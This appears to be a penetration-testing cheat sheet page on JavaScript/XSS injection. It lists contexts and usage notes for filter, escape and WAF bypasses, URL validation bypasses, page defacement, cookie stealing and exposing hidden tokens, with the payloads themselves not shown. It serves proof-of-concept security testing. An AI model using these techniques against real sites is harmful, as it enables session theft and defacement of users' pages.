🪚Javascript Injections
This section is about the payloads needed to prove XSS vulnerability
Simple Javascript Injection
Use when input lands in a script block, but if the script tag is being filtered, use inside a string delimited value.
Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload
---------------------------------------------------------------
Injection in Javascript Variable – Backticks Delimiter
Use when input lands in a script block, but if the script tag is being filtered, Angle brackets encoded in an attribute, then used inside a string delimited value.
Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload
---------------------------------------------------------------
Javascript Injection - Escape Bypass
Use when input lands in a script block, inside a string delimited value but quotes are escaped by a backslash.
Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload
---------------------------------------------------------------
Javascript Injection - Quotes Encoded Filtered Bypass
Use when input lands in a script block, inside a string delimited value but quotes are Encoded by a Filtered.
Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload
---------------------------------------------------------------
Javascript Injection - Logical Block
Use 1st or 2nd payloads when input lands in a script block, inside a string delimited value, and inside a single logical block like function or conditional (if, else, etc). If the quote is escaped with a backslash, use 3rd or 4th payload.
---------------------------------------------------------------
Javascript Injection - Quoteless
Use when there’s multi-reflection in the same line of JS code.
---------------------------------------------------------------
Placeholder Injection in Template Literal
Use when input lands inside backticks (``) delimited strings or in template engines. but quotes are escaped by a backslash.
---------------------------------------------------------------
Browser Notification
Use as an alternative to alert, prompt, and confirm popups. It requires user acceptance (1st payload) but once the user has authorized previously for that site, the 2nd one can be used.
---------------------------------------------------------------
JS Injection - Reference Error Fix
Use to fix the syntax of some hanging javascript code. Check the console tab in Browser Developer Tools (F12) for the respective Reference Error and replace var and function names accordingly.
---------------------------------------------------------------
Alert without Parentheses (Strings Only)
Use in an HTML vector or javascript injection when parentheses are not allowed and a simple alert box is enough.
---------------------------------------------------------------
JS Injection without Parentheses
Use in an HTML vector or javascript injection when parentheses are not allowed and PoC requires to return any target info.
---------------------------------------------------------------
Alert Injection Variations
All regular ways to break out from delimiters and inject alert(1) fixing the remaining syntax (without comments).
---------------------------------------------------------------
JS Injection without Alphabetic Chars
Use when alphabetic characters are not allowed. Following is alert(1).
---------------------------------------------------------------
Alert Obfuscation Use when Alert Keyword filtering
Avoiding keywords and specific substrings:
Use to trick several regular expression (regex) filters. It might be combined with previous alternatives (above). The shortest option “top” can also be replaced by “window”, “parent”, “self” or “this” depending on context.
Calling functions
---------------------------------------------------------------
Alert Obfuscation - Optional Chaining
Use to trick several regular expression (regex) filters. It might be combined with previous alternatives (above).
---------------------------------------------------------------
Alert Alternative – Write & Writeln
Use as an alternative to alert, prompt, and confirm. If used within an HTML vector it can be used as it is but if it’s a JS injection the full “document.write” form is required. Replace “&” with “%26” and “#” with “%23” in URLs. Write can be replaced by writeln.
---------------------------------------------------------------
JS Injection - Escaping From Functions and Methods
Use to execute JS code when injection lands inside a function or methods of an object and it doesn’t execute automatically. The "()=>" can be replaced by "function()" if there’s a need. It breaks out from function/method and fix the remaining syntax.
---------------------------------------------------------------
Alert Alternative – Open Pseudo-Protocol
Use as an alternative to alert, prompt, and confirm. The above tricks apply here.
---------------------------------------------------------------
Jump to URL Fragment
Use when you need to hide some characters from your payload that would trigger a WAF for example. It makes use of the respective payload format after the URL fragment (#).
---------------------------------------------------------------
Javascript Alternative Comments
Use when regular javascript comments (//) are not allowed, escaped, or removed.
---------------------------------------------------------------
URL Validation Bypass
Use to bypass the FILTER_VALIDATE_EMAIL flag of PHP’s filter_var() function or similar.
---------------------------------------------------------------
URL Validation Bypass – Query Required
Use to bypass FILTER_VALIDATE_EMAIL with FILTER_FLAG_QUERY_REQUIRED of PHP’s filter_var() function or similar.
---------------------------------------------------------------
URL Validation Bypass - Alternative to %250A or %250D
Use when %250A or %250D are not allowed.
---------------------------------------------------------------
JS Injection Bypass inside Event Handler
Use when injection is possible inside an event handler like in “onenvent=someFunction('HERE')” and quotes are escaped.
---------------------------------------------------------------
Simple Virtual Defacement
Use to change how the site will appear to the victim providing HTML code. In the example below a “Not Found” message is displayed.
---------------------------------------------------------------
Cookie Stealing
Use to get all cookies from the victim user set by the target site. It can’t get cookies protected by the httpOnly security flag. Encode “+” as “%2B” in URLs.
---------------------------------------------------------------
Alternative PoC - Shake Your Body
Use to shake all the visible elements of the page as a good visualization of the vulnerability.
---------------------------------------------------------------
Alternative PoC - Alert Hidden Values
Use to prove that all hidden HTML values like tokens and nonces in the target page can be stolen.
---------------------------------------------------------------
Last updated